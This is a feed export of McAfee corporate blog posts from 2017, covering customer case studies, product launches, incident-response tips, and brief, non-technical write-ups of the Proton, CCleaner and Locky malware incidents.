Using the McAfee ePolicy Orchestrator® (McAfee ePO™) central console, Janaka and his small team at headquarters can manage all three McAfee solutions—McAfee Complete Threat Protection Suite, McAfee Threat Intelligence Exchange, and McAfee Advanced Threat Defense—as well as McAfee DLP Endpoint (to prevent data leakage). From a single pane of glass, they set security policies and push them out to the company’s sites worldwide. Small remote teams at each of the company’s major sites also use McAfee ePO software to monitor day-to-day security in their respective environments. Because McAfee ePO software simplifies and consolidates security administration so much, Brandix needed no additional staff to augment its security arsenal and fortify its security posture.

Just as Brandix works behind the scenes to support global retail brands, McAfee integrated security works in the background at Brandix to keep data and operations secure so the company can focus on its core business. “The biggest benefit of our decision to go with McAfee Endpoint Security and the McAfee integrated security platform,” says Janaka, “is that it takes our security to next level without a huge hassle.”

To read the full case study, click here. Follow @McAfee_Business to learn more about our enterprise security solutions.

The post Securing Victoria’s Secret’s Secrets — Defending Data and Operations to Support Global Fashion Brands appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/securing-victoria-secrets-secrets-defending-data-operations-support-global-fashion-brands/feed/ 0
10 Ways to Bring your Incident Response Back from the Grave https://securingtomorrow.mcafee.com/business/10-ways-bring-incident-response-back-grave/ https://securingtomorrow.mcafee.com/business/10-ways-bring-incident-response-back-grave/#respond Wed, 01 Nov 2017 04:00:58 +0000 https://securingtomorrow.mcafee.com/?p=81902 This blog was written by Barbara Kay. It’s Día de Los Muertos—but that’s no excuse for your security threat processes to move like the walking dead. As hundreds of thousands of people around the globe take time to remember their ancestors today, we urge you to look back through your incident history. But don’t stop […]

The post 10 Ways to Bring your Incident Response Back from the Grave appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

It’s Día de Los Muertos—but that’s no excuse for your security threat processes to move like the walking dead. As hundreds of thousands of people around the globe take time to remember their ancestors today, we urge you to look back through your incident history. But don’t stop there, think about how you can improve and accelerate deadly response times.

You might be thinking easier said than done. I might as well send that goal to join the graveyard of good intentions. But you’d be doing yourself a disservice, as ‘quelling the dwell’ is more possible to put into action than you think.

So, grab a candy sugar skull, and get ready to accelerate your detection and response time with our ten simple tips:

1. No Vacations From Integrations.

Products that don’t work together are working against each other, and are a major road-block in the race to detect and respond. If your security products don’t talk to one another, you could be missing the full picture—and a breach. Integrating your detection and response systems and tools can ensure communication with the right context to speed time to detection and containment.

2. You Don’t Need a Soothsayer to Understand Scope.

It’s no surprise security professionals say that determining security incident impact and scope takes a lot of time. Many often underestimate how many servers, applications, and devices are in their organization. By implementing centralized security management, you get the visibility and monitoring you need. Per Aberdeen, if you cut time to detection and response in half, you can reduce the impact of a data breach by 30 percent and the impact on enterprise resources by 70 percent. That competitive advantage begins when you learn to understand your entire environment.

3. Keep Your Eyes on the Prize—Data.

Do you know what your data looks like on a regular basis? If not, it’s nearly impossible to realize when anomalous activity creeps into your system. Establish a baseline for your data using a solution that continually monitors traffic.

4. Vanquish Attacks with Practiced Prioritization.

Triage is the key during an attack. You must know your most critical assets, know when to sound alarms, and have structured investigation workflows and cross-functional communications already in place. Plan so that you will save precious time defending your organization’s most important assets when they come under attack.

5. This is Not a Drill!

It’s mandatory for your company to conduct fire drills…but did you know only 33 percent of companies are running regular security breach drills? This is not a drill people! Putting response procedures to the test identifies security gaps before breaches occur. Simulating breaches, conducting drills, or hiring a penetration testing firm to attack you from outside are all ways to test your ability to stop a breach.

6. Regulate Outside Access to Your Company.

Think of your company as the coolest VIP party in town, the one only a few invite-only guests with a gold key are allowed access to. Most breaches begin with third-party suppliers, partners, or cloud providers. Ensure that every entity connected to your network environment, without exception, adheres to your security policies. Also, set privilege, time, and location controls to make certain partners can access only prescribed systems and data.

For the remainder of the tips, download our white paper or infographic.

For more information follow us on Twitter at @McAfee and @McAfee_Business.

The post 10 Ways to Bring your Incident Response Back from the Grave appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/10-ways-bring-incident-response-back-grave/feed/ 0
When Your Media Player Watches You – Trojan Infects Software Downloads for Macs https://securingtomorrow.mcafee.com/business/when-your-media-player-watches-you-trojan-infects-software-downloads-for-macs/ https://securingtomorrow.mcafee.com/business/when-your-media-player-watches-you-trojan-infects-software-downloads-for-macs/#respond Wed, 25 Oct 2017 22:45:58 +0000 https://securingtomorrow.mcafee.com/?p=81573 Users downloading a media player to watch videos on their Macs ended up being watched by cybercriminals using Trojan malware to spy on victims’ operating systems. Unfortunately, that’s the case for the popular Mac OSX media player, Elmedia Player. A trojanized version of the program has hit the scene as a result of the developer’s […]

The post When Your Media Player Watches You – Trojan Infects Software Downloads for Macs appeared first on McAfee Blogs.

]]>
Users downloading a media player to watch videos on their Macs ended up being watched by cybercriminals using Trojan malware to spy on victims’ operating systems.

Unfortunately, that’s the case for the popular Mac OSX media player, Elmedia Player. A trojanized version of the program has hit the scene as a result of the developer’s servers being hacked by cybercriminals.

It all started when a Remote Access Trojan (RAT), named Proton, snuck into the developer’s servers via a breach in their JavaScript library. From there, the threat was able to actually live on the developers official site for a period of time. Seemingly complete legitimate, the trojanized player was ready for download, which translates to: ready to infect any innocent user that may stumble across it.

The compromised package was created in order to deliver the latest version of the Proton backdoor on a broad scale. Proton is a Trojan that poses as legitimate programs or files, such as Elmedia Player, in order to trick and entice users into unknowingly running it. Upon being launched, the Proton backdoor provides attackers with an almost full view of the compromised system, allowing the theft of browser information, keylogs, usernames and passwords, cryprocurrency wallets, macOS keychain data and more.

Users have been warned that if they downloaded the software prior to the October 19th disclosure (after which Eltima Software removed the program from the site), they run the risk of having their system infected by the malware. And since Elmeida boasts over one million users, it’s crucial we all start looking towards next steps.

Users can start by seeing if any of the following files or directories are on their system, which would mean the trojanized version of Elmedia Player has been installed:

  • /tmp/Updater.app/
  • /Library/LaunchAgents/com.Eltima.UpdaterAgent.plist
  • /Library/.rand/
  • /Library/.rand/updateragent.app/

If a user is in fact infected, the next step would be to undergo a full OS re-installation. And for Elmedia Player users who are wishing to run the program safely once more, fear not. Users are now able to download a clean version of Elmedia Player from the Eltima website, which has said to be now free of compromise.

To learn more about this Trojan, and others like, be sure to follow @McAfee and @McAfee_Business.

The post When Your Media Player Watches You – Trojan Infects Software Downloads for Macs appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/when-your-media-player-watches-you-trojan-infects-software-downloads-for-macs/feed/ 0
Safe Soaring: McAfee Advances Customer Success with Integrated Analytics, Ecosystems, and Experiences at MPOWER https://securingtomorrow.mcafee.com/business/safe-soaring-mcafee-advances-customer-success-integrated-analytics-ecosystems-experiences-mpower/ https://securingtomorrow.mcafee.com/business/safe-soaring-mcafee-advances-customer-success-integrated-analytics-ecosystems-experiences-mpower/#respond Wed, 18 Oct 2017 20:01:24 +0000 https://securingtomorrow.mcafee.com/?p=80593 This blog was written by Barbara Kay. Security embodies the analogy of fixing a plane in flight. Every company has some variety of security people, process, and technology in place already. So, like a plane in flight, your security infrastructure needs an operational model that can be updated, adapted, repaired, or serviced while it is […]

The post Safe Soaring: McAfee Advances Customer Success with Integrated Analytics, Ecosystems, and Experiences at MPOWER appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

Security embodies the analogy of fixing a plane in flight. Every company has some variety of security people, process, and technology in place already. So, like a plane in flight, your security infrastructure needs an operational model that can be updated, adapted, repaired, or serviced while it is actively at work protecting your business infrastructure.

A successful model must accommodate several inconvenient truths. Security systems are not set-and-forget, nor does any product or service exist in a vacuum. There’s no single vendor. The people-process-technology trifecta takes a sound, extensible architecture and continual nourishment to support healthy and secure enterprise operations.

These truths are fundamental to the McAfee threat defense lifecycle model and human-machine teaming vision, which received new support this week in Las Vegas at the MPOWER Cybersecurity Summit. Here’s an overarching view and examples of the 360 degree approach McAfee is taking for customer success. We are innovating in products, in industry collaboration, in cloud enablement, and in the customer relationship model.

Innovating in Analytics

Multiple new and updated products increase the precision, efficiency, and efficacy of defenses and security operations through new analytics based on machine learning, artificial intelligence, and really smart people in our Foundstone consulting practice and McAfee Labs.

  • New McAfee Investigator solution applies advanced analytics to increase SOC productivity
  • Deep Learning integrated into McAfee Endpoint Security, leveraging knowledge gleaned from both pre- and post-execution review
  • New McAfee innovations feature ransomware decryption and a new “stegware” or steganography detection initiative

Breaking Glass (and Silos)

ESG research shows that enterprises want to embrace automation as a means of getting more done with existing resources, but automation is contingent on integration of data and processes between products. That’s been difficult because of the many moving parts: accessible APIs, vendor politics, and available integration skills and time.

We’ve taken the need for easier integration to heart, building on the success of the Data Exchange Layer and the OpenDXL initiative, announced one year ago. This week, McAfee unveiled a ground-breaking , bridging two communications fabrics and ecosystems for end-to-end visibility and risk mitigation. By linking the Data Exchange Layer with Cisco pxGrid, we have extended the reach of high-fidelity data and the range of automated actions companies can implement, and increased the possibilities when companies take advantage of the OpenDXL open source initiative and its community.

Industry leadership like this is one reason the McAfee Security Innovation Alliance ecosystem continues to flourish, and MPOWER celebrated a nearly 15% surge in new independent software vendors joining the community.

Protecting Hybrid Cloud

One challenge of enhancing our “plane in flight” is the heterogeneous nature of the infrastructure itself. Few, if any, organizations operate security and business systems purely on-premises or purely in the cloud. Hybrid infrastructures require adaptation of implementation, access control, visibility, policies, and reporting to span and accommodate this diversity.

McAfee has expanded our portfolio of hybrid products and services with new options for using and leveraging the cloud alongside other security and corporate infrastructure.

Re-imagining CX

Finally, let’s think about the experience of managing and maintaining the plane in flight. The pilot (CISO) needs to get the job done while he keeps the passengers (end-users) happy and safe and minimizes wear and tear on his co-pilot, flight crew, and ground personnel (CIO, architect, SOC analysts, and administrators). A unified plan for the flight experience will permeate calm and reliability through the flight, using best practices to implement features and updates, as well as anticipate challenges and inevitable changes.

This is the design center for a new team at McAfee. At MPOWER, McAfee announced the new Customer Success Group, which unifies services, support, education, and consulting. Their first deliverable is the new Premier Success Plan.

This plan understands that buying the right tools is just a starting point. Post-sales decisions around design, deployment, maintenance, risk management, escalations, education, and strategy will have a dramatic impact on an organization’s security posture, time to value, and value over time. With so many options to choose from, it’s not always easy to know which consulting, service, and support you need to be successful. Without tracking, your team may not capture full value from the ones you order.

Our new Premier Success Plan takes away the guesswork and fills in the gaps. A comprehensive roadmap combines professional and solutions services, training, and technical support with personalized management.

Benefits All Year Long

Each year, this fall conference ushers in a wave of products, programs, and ideas, just in time for planning for the next year. You don’t need to attend to capture all of the product and programs value, but the community, camaraderie, and creativity you experience can be a welcome rejuvenation from the ongoing stress of flying the security plane.

This year, it was especially important #VegasStrong.

We hope to see you next year. Soar safely.

Stay up to date on all things MPOWER17 by following us on Twitter at @McAfee.

The post Safe Soaring: McAfee Advances Customer Success with Integrated Analytics, Ecosystems, and Experiences at MPOWER appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/safe-soaring-mcafee-advances-customer-success-integrated-analytics-ecosystems-experiences-mpower/feed/ 0
Introducing McAfee Investigator: Automated, Expert System-Based Analytics to Transform the SOC https://securingtomorrow.mcafee.com/business/introducing-mcafee-investigator-automated-expert-system-based-analytics-transform-soc/ https://securingtomorrow.mcafee.com/business/introducing-mcafee-investigator-automated-expert-system-based-analytics-transform-soc/#respond Wed, 18 Oct 2017 16:02:18 +0000 https://securingtomorrow.mcafee.com/?p=80085 This blog was written by Barbara Kay. SOC analysts are getting beaten up by both commodity attacks and sophisticated ones, with many companies taking far more than a day or a week to close a case and few consistently digging all the way to root cause. McAfee research collected in May 2017 documented this dilemma […]

The post Introducing McAfee Investigator: Automated, Expert System-Based Analytics to Transform the SOC appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

SOC analysts are getting beaten up by both commodity attacks and sophisticated ones, with many companies taking far more than a day or a week to close a case and few consistently digging all the way to root cause. McAfee research collected in May 2017 documented this dilemma and showed that companies are investing in advanced analytics and automation as a way to fight back:

  • 85% of SOCS want to use more analytics
  • 84% of SOCs want to use automation to move up the maturity scale
  • Mature SOCs automate more than 3X more often than new SOC teams, but almost everyone is investing
  • Mature SOCs automate more than 50% of investigation processes, and want to automate more
  • Top active automation areas include real-time endpoint analysis, triage, forensics, and remediation.

We’re eager to help. As part of our expanding portfolio of automated threat and malware analytics based on machine learning, McAfee is proud to announce McAfee Investigator, a SaaS analytics subscription that transforms novice analysts into expert investigators. Rather than adding complexity with yet another product silo, it leverages the data sources and alerts of a SIEM and includes real-time endpoint visibility via McAfee ePolicy Orchestrator and a dissoluble agent.

McAfee Investigator automates data collection, organization, and case management within an expert system-driven workspace. Starting with prioritized triage, automation, Foundstone expertise, and machine learning (in fact, artificial intelligence as well) come together to guide analysts to consider the right questions and hypotheses for the specific situation. Insights with drill downs and visualizations help them explore the most relevant details and subtle indicators as they move rapidly through scoping, validation, documentation, and disposition.

Scott Howitt, senior vice president in the CISO organization of MGM International, says that McAfee Investigator helps them to spend more time on actual investigations:

“The way Investigator helps me mature my organization is with the automated playbooks, with the easier ability to go find like problems in my environment and things like that. My team spends less time switching between tools and focusing on how to make the tool work and actually focusing on the investigation than they did before.”

This service helps SOC teams mature operations as they fulfill several goals:

If you have an overworked SOC and a yen to try a new model that makes the most of the strengths of both humans and machines, this new service is worth a look. Visit mcafee.com/investigator or contact your sales manager to learn more.

For more news on McAfee Investigator and updates from MPOWER17 follow us on Twitter at @McAfee.

The post Introducing McAfee Investigator: Automated, Expert System-Based Analytics to Transform the SOC appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/introducing-mcafee-investigator-automated-expert-system-based-analytics-transform-soc/feed/ 0
McAfee Labs Threats Report Explores WannaCry/Petya, Threat Hunting, Script-Based Malware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-wannacrypetya-threat-hunting-script-based-malware/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-wannacrypetya-threat-hunting-script-based-malware/#respond Tue, 26 Sep 2017 04:01:42 +0000 https://securingtomorrow.mcafee.com/?p=78900 Today we published the McAfee Labs Threats Report: September 2017. This quarter’s report shows off a new design. We hope you will find it attractive as well as informative.

The post McAfee Labs Threats Report Explores WannaCry/Petya, Threat Hunting, Script-Based Malware appeared first on McAfee Blogs.

]]>
This blog post was written by Vincent Weafer.

Today we published the McAfee Labs Threats Report: September 2017. This quarter’s report shows off a new design. We hope you will find it attractive as well as informative. The report contains three highly educational topics, in addition to the usual set of threats statistics:

  • Earlier this year, WannaCry malware infected more than 300,000 computers in over 150 countries in less than 24 hours. Several weeks later, the malware Petya exploited the same operating systems’ flaw along with multiple other techniques to spread to other computers on the same network. These attacks exposed among other lessons the continued use of old and unsupported operating systems in critical areas and they laid bare the lax patch-update processes followed by some businesses. We explore the timeline and background of the WannaCry attack and Petya, its apparent follow-up; the vulnerabilities they exploited; a technical analysis of their infiltration and propagation methods; and our thoughts on the motives for these attacks and what they might lead to.
  • Threat hunting is a growing and evolving capability in cybersecurity, one with a broad definition and wide range of goals, but it is generally seen as a proactive approach to finding attacks and compromised machines without waiting for alerts. Threat hunting enables security operations to study the behaviors of attackers and build more visibility into attack chains. This results in a more proactive stance for the security operations center, shifting the focus to earlier detection, faster reaction times, and enhanced risk mitigation. In May, McAfee surveyed more than 700 IT and security professionals around the world to better understand how threat hunting is used in organizations today and how they plan to enhance their threat hunting capabilities in the future. We offer detailed advice and recommendations for using certain types of indicators of compromise when hunting for threats.
  • Cyberattackers often use scripting techniques in their assaults. Some attacks employ script-based malware at every stage, while others use it for a specific purpose. Script-based malware—written in the JavaScript, VBS, PHP, or PowerShell scripting languages—has been on the upswing during the last two years for a very simple reason: evasion. Scripts are easy to obfuscate and thus are difficult for security technology to detect. In this Key Topic, we discuss why cybercriminals leverage script-based malware, how script-based malware propagates, the types of malware that use scripts for distribution, ways in which authors obfuscate script-based malware, and how to protect against script-based malware.

Accompanying the first and last Key Topic are Solution Briefs that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q2:

  • Malware: New malware samples leaped in Q2 to 52 million, a 67% increase. The total number of malware samples grew 23% in the past four quarters to almost 723 million samples.
  • Ransomware: New ransomware samples again increased sharply in Q2, by 54%. The number of total ransomware samples grew 47% in the past four quarters to 10.7 million samples.
  • Mobile malware: Global infections of mobile devices rose by 8%, led by Asia with 18%. Total mobile malware grew 61% in the past four quarters to 18.4 million samples.
  • Incidents: We counted 311 publicly disclosed security incidents in Q2, an increase of 3% over Q1. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q2 took place in the Americas.

Read the McAfee Labs Threats Report: September 2017.

The post McAfee Labs Threats Report Explores WannaCry/Petya, Threat Hunting, Script-Based Malware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-threats-report-explores-wannacrypetya-threat-hunting-script-based-malware/feed/ 0
Is that Broom Removing the Dirt? Sanitizing CCleaner with McAfee Advanced Threat Defense https://securingtomorrow.mcafee.com/business/sanitizing-ccleaner-with-mcafee-atd/ https://securingtomorrow.mcafee.com/business/sanitizing-ccleaner-with-mcafee-atd/#respond Wed, 20 Sep 2017 20:00:13 +0000 https://securingtomorrow.mcafee.com/?p=78845 This blog was written by Stan Golubchik. On Monday, security researchers in Cisco’s Talos division revealed that the ever popular, free computer clean up tool CCleaner had been compromised for at least the past month. Hackers utilized a backdoor vulnerability through the software’s updating system into the application. With an estimated installation base of 2.27 […]

The post Is that Broom Removing the Dirt? Sanitizing CCleaner with McAfee Advanced Threat Defense appeared first on McAfee Blogs.

]]>
This blog was written by Stan Golubchik.

On Monday, security researchers in Cisco’s Talos division revealed that the ever popular, free computer clean up tool CCleaner had been compromised for at least the past month. Hackers utilized a backdoor vulnerability through the software’s updating system into the application. With an estimated installation base of 2.27 million, which highlights the pervasiveness of the application and the potential customers who could be susceptible to a breach, this could bloom into a widespread issue.

This is an atypical scenario as CCleaner has been a trusted application by users. By exploiting the trust relationship established between this commonly known good application, attackers can tap into the inherited trusted web servers which host and distribute updates.

Taking a quick glimpse at VirusTotal, it’s apparent that most endpoint vendors have not caught on to the compromised application. Luckily those with McAfee defenses including McAfee Advanced Threat Defense (ATD), the advanced sandbox, could thwart the obfuscated malicious activity within the ever trusted CCleaner.

Without the requirement of amending a blacklist or a DAT update, ATD could detect malicious behavior in the latest version of 5.34 of CCleaner. ATD provides manual investigation by allowing the user an interactive window, or X-mode, into the VM which detonates the sample for analysis. Looking at the Threat Analysis Report generated after the application was analyzed, compelling evidence can be observed on the true intent of the application.

So exactly what behavior was exhibited as malicious and tagged with such a high severity? As stated earlier, attackers have exploited the trust between the update mechanism in the application with the web servers from which the updates are pulled. Looking at the Dynamic Analysis, it’s apparent that the application was attempting to download content from a suspicious webserver. Also, there is an action that describes the intent of the file to behave as ransomware would.

X-mode allows the ATD user to interact with the program while it’s running isolated within the virtual analysis environment. In addition to simply installing, executing, and running the application, the user can perform tasks in CCleaner to emulate real world behavior to reveal any evasive and latent code. As seen from the screenshot provided in the report, the application’s functionality can be triggered and monitored in an isolated environment to prevent any propagation of the threat.

Additionally, other behavioral awareness indicators can be observed through the report, providing a more thorough analysis and confident assessment of the intent of the application. These include embedded and dropped content, file operations, and network activity.

CCleaner has historically been a reliable tool in sweeping up and cleaning a machine’s unwanted temporary files and invalid Windows registry entries. Reliability that’s trusted by millions. Through the exploitation of this trust-based relationship between the application and users, attackers could successfully utilize a method to infiltrate and potentially compromise victim machines. This is where advanced malware detection capabilities demonstrate their true value. McAfee Advanced Threat Defense swept up the unwanted files and cleaned house. Even your trusty broom needs a good cleaning occasionally.

The post Is that Broom Removing the Dirt? Sanitizing CCleaner with McAfee Advanced Threat Defense appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/sanitizing-ccleaner-with-mcafee-atd/feed/ 0
Head of Security Operations Talks About His “Leap of Faith” Hiring McAfee Resident Support https://securingtomorrow.mcafee.com/business/head-security-operations-talks-leap-faith-hiring-mcafee-resident-support/ https://securingtomorrow.mcafee.com/business/head-security-operations-talks-leap-faith-hiring-mcafee-resident-support/#respond Tue, 12 Sep 2017 14:00:44 +0000 https://securingtomorrow.mcafee.com/?p=77500 Serving more than seven million clients and members, The Desjardins Group is the largest financial cooperative in Canada. Its employees like to say that it provides the gamut of financial services “from birth to death.” To protect the Group’s geographically dispersed network of 47,600 employees and 70,000 endpoints (including more than 8,000 servers), Christian Gauthier, […]

The post Head of Security Operations Talks About His “Leap of Faith” Hiring McAfee Resident Support appeared first on McAfee Blogs.

]]>
Serving more than seven million clients and members, The Desjardins Group is the largest financial cooperative in Canada. Its employees like to say that it provides the gamut of financial services “from birth to death.”

To protect the Group’s geographically dispersed network of 47,600 employees and 70,000 endpoints (including more than 8,000 servers), Christian Gauthier, director of surveillance and security, has an extensive staff. His team oversees a host of McAfee products purchased under an Enterprise License Agreement (ELA). In 2014, he added a McAfee Resident Support Account Manager (RSAM), Yves Melançon.

“Initially, paying for an RSAM was quite a tough sell and required a leap of faith,” says Gauthier.

He already had a highly skilled staff, as McAfee RSAM Melançon confirms. “I have been at many companies and Desjardins’ security staff stand out,” says Melançon.

Gauthier was willing to take that leap of faith, however, because even a few hours of downtime—for instance, if online banking goes down—cost The Desjardins Group greatly. Gauthier believed that a McAfee RSAM would pay off in faster time to resolution and downtime avoidance.

His faith was rewarded.

“We have found Yves to be worth much more than the additional staff we might have hired instead of him,” says Gauthier. “He is extremely knowledgeable and can figure out what’s wrong or else escalate to the right people and get us quickly to resolution, usually without me having to say a word. By saving us time and helping us avoid downtime, he has saved us a lot of money.”

Hard Numbers and Examples

When the McAfee RSAM contract came up for renewal, Gauthier knew that The Desjardins Group’s new chief information security officer would require more than just his word that Yves Melancon was worth the cost. So Gauthier gathered “hard numbers” and specific examples to demonstrate the value of the RSAM.

“Using very conservative figures, I easily justified Yves’ presence,” says Gauthier. “Yves’ ability to accelerate resolution—to get answers in seconds rather than having to open a ticket, or to go directly to the best resource within McAfee— has minimized costly downtime and disruption as well as saved us a ton of time.”

Gauthier also cited specific examples of time and monetary savings that could be credited to having a McAfee RSAM on board. For instance, intrusion prevention system latency was preventing The Desjardins Group from taking on a very large retail chain that desired to use its payment system. As soon as Melançon learned of the situation, he contacted the McAfee Network Security Platform (IPS) developers, who quickly ascertained the problem. Within 48 hours, the problem was solved, outdated equipment replaced, and Desjardins had a major new customer and revenue stream. That incident alone proved the immense value of the RSAM.

In his figures for the CISO, Gauthier didn’t factor in time saved from faster deployment and deployment done right the first time. Take, for example, a recent deployment of McAfee Advanced Threat Defense. “With Yves’ help, McAfee Advanced Threat Defense worked well from the start, immediately catching ransomware, greyware, and banking-specific malware,” explains Gauthier. “The kind of knowledge and insider access to resources that Yves has, you just can’t hire that off the street.”

Gauthier recalls an interaction at the annual McAfee FOCUS (now MPOWER) user conference two years ago that made him value his McAfee RSAM even more. “We had been having trouble with a now obsolete McAfee product,” he recollects. “Yves walked me over to the top technical person for that product, introduced me, and basically demanded that our issues be addressed immediately. I knew without a doubt he was working for me and it made a real difference.”

How do you know if an RSAM is right for your company?

Gauthier is clearly happy with his decision to hire a McAfee RSAM, but should every company with 70,000 nodes hire an RSAM? Should every company with more than a certain threshold of nodes or number of McAfee products?

Not necessarily.

According to Gauthier, whether you should consider hiring an RSAM doesn’t depend on the number of nodes or products, but on complexity. “As the complexity of your McAfee security environment increases, the value of a McAfee RSAM grows exponentially,” he says. “Having the right person with access to the right resources makes an enormous difference.”

The founder of The Desjardins Group, Alphonse Desjardins, had a motto: “S’unir pour server,” which translates to “Unite to serve,” similar to McAfee’s motto “Together is Power.” No wonder Melançon fits right in.

“Yves is as much a part of our team as those receiving a paycheck from Desjardins,” Gauthier says. “There is no ‘theirs’ and ‘ours’; we are one team and he’s one of ours.”

 

To read the full case study, click here. Get your questions answered by tweeting @McAfee_Business.

The post Head of Security Operations Talks About His “Leap of Faith” Hiring McAfee Resident Support appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/head-security-operations-talks-leap-faith-hiring-mcafee-resident-support/feed/ 0
Locky Ransomware Makes a Comeback with New .Diablo6 and .Lukitus Variants https://securingtomorrow.mcafee.com/business/locky-ransomware-makes-comeback-new-diablo6-lukitus-variants/ https://securingtomorrow.mcafee.com/business/locky-ransomware-makes-comeback-new-diablo6-lukitus-variants/#respond Mon, 28 Aug 2017 17:12:47 +0000 https://securingtomorrow.mcafee.com/?p=77230 Tim Hux contributed to this blog. Old threats die hard it seems as Locky ransomware, one of the most powerful threats out there, is back in town. Historically, we’ve seen this ransomware do serious damage, as it has rapidly adapted its capabilities to keep victims and security researchers bewildered. Now, it’s evolved with two new […]

The post Locky Ransomware Makes a Comeback with New .Diablo6 and .Lukitus Variants appeared first on McAfee Blogs.

]]>
Tim Hux contributed to this blog.

Old threats die hard it seems as Locky ransomware, one of the most powerful threats out there, is back in town. Historically, we’ve seen this ransomware do serious damage, as it has rapidly adapted its capabilities to keep victims and security researchers bewildered. Now, it’s evolved with two new forms to become even more stealthy and advanced.

First, let’s back up – where did Locky get its start? Locky was discovered in late 2015 and has been one of the most prevalent ransomware threats to date, contending with the likes of Cerber, Petya, Spora, and WannaCry. In 2016, Locky hit its stride – infecting millions of users worldwide primarily through malicious attachments in spam emails. To become more agile, the malware changed what extension is appended to encrypted files and utilized the .locky, .zepto, and .odin extensions across unique instances. Fast forward to 2017 and the stealthy ransomware is back on the scene—equipped with two variants that leverage either the .Diablo6 or .Lukitus extension for encrypting files.

What do these .Diablo6 and .Lukitus variants look like? Both variants are distributed via spam emails, though this particular campaign sends them in the form of PDF attachments with embedded .DOCM files. They’re also spread through the Necurs botnet, which Locky used in the past.

Beyond utilizing the Necurs botnet, both variants do carry some other callbacks to older versions Locky. All variants (old and new) contain a flag in the code that checks if the language of the Windows operating system is Russian and will not run and encrypt victims’ files if so. This is most likely because the majority of Locky attacks are originating from Russia, as exemplified in this map below.

Given both .Diablo6 and .Lukitus are demanding a ransom of .49 BTC (roughly $1,900.00) for the decryption key to unlock the infected files and those behind Locky have yet to be identified, the next question is – what can users do to stay secure?

Start with education. Since the latest two variants of Locky come in the form of spam email with zip or rar attachments, it’s important everyone is trained on how to deal with suspicious emails. Additionally, be sure to back up your data often in case you need to wipe your device clean after an attack. You can do this by utilizing a backup drive or by backing up to the cloud. This way, you can easily retrieve your important information without paying a ransom.

Stay up-to-date on Locky ransomware and others like it by following @McAfee and @McAfee_Business.

The post Locky Ransomware Makes a Comeback with New .Diablo6 and .Lukitus Variants appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/locky-ransomware-makes-comeback-new-diablo6-lukitus-variants/feed/ 0
Time to Close vs. Root Cause – Are we measuring the wrong thing (again)? https://securingtomorrow.mcafee.com/business/security-operations/time-to-close-vs-root-cause/ https://securingtomorrow.mcafee.com/business/security-operations/time-to-close-vs-root-cause/#respond Tue, 22 Aug 2017 19:00:08 +0000 https://securingtomorrow.mcafee.com/?p=77013 This blog was written by Barbara Kay. “Human beings adjust behavior based on the metrics they’re held against. Anything you measure will impel a person to optimize his score on that metric. What you measure is what you’ll get. Period.” – Dan Ariely, Duke University behavioral economist in Harvard Business Review   When the Verizon Data […]

The post Time to Close vs. Root Cause – Are we measuring the wrong thing (again)? appeared first on McAfee Blogs.

]]>
This blog was written by Barbara Kay.

“Human beings adjust behavior based on the metrics they’re held against. Anything you measure will impel a person to optimize his score on that metric. What you measure is what you’ll get. Period.” – Dan Ariely, Duke University behavioral economist in Harvard Business Review  

When the Verizon Data Breach Investigation Report started reporting “time to” metrics around 2013 (time to detect, time to contain, time to remediate), most security operations managers started to monitor their own team’s performance against these stats. That’s not a bad thing – I’ve certainly touted these numbers in my posts before. They help assess workloads and justify investment.

However, as managers, we need to add another lens to emphasize efficiency AND effectiveness.

Closing cases (time to contain, time to remediate) without getting to root cause is like chopping off the arm of the starfish – the arm will likely grow back and may come back bigger and nastier.

Why care about root cause?

Root cause is the secret to returning to a healthy state. Getting to root cause means you identify how the attacker got in, which systems provided cover, which credentials were abused, and how they manipulated system, countermeasure, and application software to hide their tracks. When you push investigations to the point of root cause analysis, you are more likely to fully scope the attacker’s activities and excise them from your estate. If you don’t get to root cause, an attacker may retain a foothold, ready to reactivate after you have reimaged the host or blocked an IP address and claimed “case closed.” That lingering presence means you still risk damage, as well as repeated cleanup costs.

In Disrupting the Disruptors, Art or Science?, we researched threat hunting practices in security operations centers. Time to close is an important stat, and the most mature orgs are closing faster than anyone else, by a huge margin. Mature orgs were 2 times more likely to close cases within a day than the merely innovative, and closer to three times more likely to close within a day than the SOCs just getting started. (For details on the maturity definitions and other findings, download the free report.)

Leaders close, with higher confidence the incident won’t recur

But – there’s another very important metric that clearly isn’t being rewarded as aggressively, or the numbers would be better, per the behavioral psychologists who say you get what you measure. The most advanced threat hunting organizations are winning on time to close AND aggressively uncovering root cause. Hunters at the minimal level typically determine the cause of just 20-30% of attacks, compared to leading hunters’ digging in to find 70% or more.

Net net: the leading SOCs are closing more cases faster AND getting to root cause most of the time – performing far better than their peer groups. As an industry, let’s start to measure both of these goals to increase overall cybersecurity health.

For insights on how leading SOCs are achieving these results, such as advanced use of automation and sandboxing, read the report.

The post Time to Close vs. Root Cause – Are we measuring the wrong thing (again)? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/time-to-close-vs-root-cause/feed/ 0
